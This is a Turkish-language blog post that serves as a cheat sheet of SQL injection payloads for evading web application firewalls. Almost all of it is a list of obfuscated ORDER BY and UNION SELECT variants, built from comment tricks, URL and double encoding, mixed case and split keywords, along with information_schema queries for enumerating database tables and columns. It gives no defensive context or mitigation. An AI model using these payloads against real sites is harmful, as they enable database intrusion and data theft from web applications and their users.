27 Temmuz 2021 Salı

SQL WAF Atlatma UnionSelect OrderBy Bilgi Tablosu



SQL Waf UnionSelect Bypass Teknikleri ve Örnekleri

SQL WAF Atlatma UnionSelect OrderBy Bilgi Tablosu


Best Bypass WAF Methods


_____________________________________________________________________

SQL ORDER BY Bypass Teknikleri [ Örnekler ]


[~] order by [~]

/**/ORDER/**/BY/**/

/*!order*/+/*!by*/

/*!ORDER BY*/

/*!50000ORDER BY*/

/*!50000ORDER*//**//*!50000BY*/

/*!12345ORDER*/+/*!BY*/

_____________________________________________________________________

SQL Union Select Bypass Yöntem ve Teknikleri [ Örnekler ]


[~] UNION select [~]

/*!00000Union*/ /*!00000Select*/

/*!50000%55nIoN*/ /*!50000%53eLeCt*/

%55nion %53elect

%55nion(%53elect 1,2,3)-- -

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/UNION/**//*!50000SELECT*//**/

/*!50000UniON SeLeCt*/

union /*!50000%53elect*/

+ #?uNiOn + #?sEleCt

+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt

/*!%55NiOn*/ /*!%53eLEct*/

/*!u%6eion*/ /*!se%6cect*/

+un/**/ion+se/**/lect

uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

REVERSE(noinu)+REVERSE(tceles)

/*--*/union/*--*/select/*--*/

union (/*!/**/ SeleCT */ 1,2,3)

/*!union*/+/*!select*/

union+/*!select*/

/**/union/**/select/**/

/**/uNIon/**/sEleCt/**/

+%2F**/+Union/*!select*/

/**//*!union*//**//*!select*//**/

/*!uNIOn*/ /*!SelECt*/

+union+distinct+select+

+union+distinctROW+select+

uNiOn aLl sElEcT

UNIunionON+SELselectECT

/**/union/*!50000select*//**/

0%a0union%a0select%09

%0Aunion%0Aselect%0A

%55nion/**/%53elect

uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*--*//*!all*//*--*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

+UnIoN/*&a=*/SeLeCT/*&a=*/

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

%23xyz%0AUnIOn%23xyz%0ASeLecT+

%23xyz%0A%55nIOn%23xyz%0A%53eLecT+

union(select(1),2,3)

union (select 1111,2222,3333)

uNioN (/*!/**/ SeleCT */ 11)

union (select 1111,2222,3333)

+#1q%0AuNiOn all#qa%0A#%0AsEleCt

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/

%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+

+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/

+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+

/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/

/union\sselect/g

/union\s+select/i

/*!UnIoN*/SeLeCT

+UnIoN/*&a=*/SeLeCT/*&a=*/

+uni>on+sel>ect+

+(UnIoN)+(SelECT)+

+(UnI)(oN)+(SeL)(EcT)

+’UnI”On’+'SeL”ECT’

+uni on+sel ect+

+/*!UnIoN*/+/*!SeLeCt*/+

/*!u%6eion*/ /*!se%6cect*/

uni%20union%20/*!select*/%20

union%23aa%0Aselect

/**/union/*!50000select*/

/^.*union.*$/ /^.*select.*$/

/*union*/union/*select*/select+

/*uni X on*/union/*sel X ect*/

+un/**/ion+sel/**/ect+

+UnIOn%0d%0aSeleCt%0d%0a

UNION/*&test=1*/SELECT/*&pwn=2*/

un?+un/**/ion+se/**/lect+

+UNunionION+SEselectLECT+

+uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

/*!UnIoN*/SeLecT+


[~] More Union Select [~]


[+] Union Select:


union /*!select*/+

union/**/select/**/

/**/union/**/select/**/

/**/union/*!50000select*/

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

/**/uniUNIONon/**/selSELECTect/**/

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

/**//*!union*//**//*!select*//**/

/**/UNunionION/**/SELselectECT/**/

/**//*UnIOn*//**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

/**/UNunionION/**/all/**/SELselectECT/**/

/**//*UnIOn*//**/all/**//*SEleCt*//**/

/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/

uni

%20union%20/*!select*/%20

union%23aa%0Aselect

union+distinct+select+

union+distinctROW+select+

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

/*!u%6eion*/+/*!se%6cect*/+

1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

+%2F**/+Union/*!select*/

%55nion %53elect

+–+Union+–+Select+–+

+UnIoN/*&a=*/SeLeCT/*&a=*/

uNiOn aLl sElEcT

uUNIONnion all sSELECTelect

union(select(1),2,3)

union (select 1111,2222,3333)

union (/*!/**/ SeleCT */ 11)

%0A%09UNION%0CSELECT%10NULL%

/*!union*//*–*//*!all*//*–*//*!select*/

union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C

union+sel%0bect

+uni*on+sel*ect+

+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a

union(select (1),(2),(3),(4),(5))

UNION(SELECT(column)FROM(table))

id=1+’UnI”On’+’SeL”ECT’

id=1+’UnI’||’on’+SeLeCT’

union select 1–+%0A,2–+%0A,3–+%0A etc

_____________________________________________________________________

SQL Bilgi Şeması Tabloları WAF Bypass


[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -

/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

_____________________________________________________________________

0 comments:

Yorum Gönder